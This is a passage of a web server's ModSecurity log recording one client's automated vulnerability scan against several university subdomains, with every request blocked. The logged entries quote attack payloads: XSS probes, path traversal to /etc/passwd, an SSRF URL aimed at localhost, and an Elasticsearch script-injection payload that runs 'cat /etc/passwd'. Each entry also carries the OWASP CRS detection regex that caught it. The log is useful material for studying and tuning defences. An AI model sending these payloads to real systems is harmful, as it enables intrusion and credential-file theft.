"OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAArIAaEAAAAX"]
[Tue Aug 29 11:56:48.715378 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAqqtlcAAAAA"]
[Tue Aug 29 11:56:48.722151 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:015383/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16kMCo-f0AAAocyo8AAAAR"]
[Tue Aug 29 11:56:48.736315 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16kMCo-f0AAAqqtlgAAAAA"]
[Tue Aug 29 11:56:48.743574 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16kMCo-f0AAAocypAAAAAR"]
[Tue Aug 29 11:56:48.796623 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAArIAaUAAAAX"]
[Tue Aug 29 11:56:49.526960 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16kcCo-f0AAAqsWCUAAAAB"]
[Tue Aug 29 11:56:49.601452 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16kcCo-f0AAAq@sokAAAAM"]
[Tue Aug 29 11:56:49.603453 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:at: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kcCo-f0AAAq5@WkAAAAK"]
[Tue Aug 29 11:56:49.650749 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16kcCo-f0AAArZP2UAAAAC"]
[Tue Aug 29 11:56:50.542818 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAq5@WwAAAAK"]
[Tue Aug 29 11:56:50.552176 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16ksCo-f0AAAqqtl0AAAAA"]
[Tue Aug 29 11:56:50.708126 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAoz8PcAAAAS"]
[Tue Aug 29 11:56:50.731381 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAqsWDEAAAAB"]
[Tue Aug 29 11:56:51.571830 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16k8Co-f0AAAoz8PoAAAAS"]
[Tue Aug 29 11:56:51.665363 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArB15gAAAAV"]
[Tue Aug 29 11:56:51.685476 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "pusatbahasa.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAolK8EAAAAe"]
[Tue Aug 29 11:56:51.688681 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "informatika.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArZP3IAAAAC"]
[Tue Aug 29 11:56:51.701646 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "ft.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAqqtmUAAAAA"]
[Tue Aug 29 11:56:51.767961 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "journal.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArIAbQAAAAX"]
[Tue Aug 29 11:56:52.691393 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAoz8QEAAAAS"]
[Tue Aug 29 11:56:52.694574 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAArB154AAAAV"]
[Tue Aug 29 11:56:52.696146 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAq-Hh4AAAAT"]
[Tue Aug 29 11:56:52.708118 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAolK8gAAAAe"]
[Tue Aug 29 11:56:52.724480 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAArIAbkAAAAX"]
[Tue Aug 29 11:56:52.731474 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAqqtmsAAAAA"]
[Tue Aug 29 11:56:52.736893 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAArB16AAAAAV"]
[Tue Aug 29 11:56:52.771908 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAqqtm0AAAAA"]
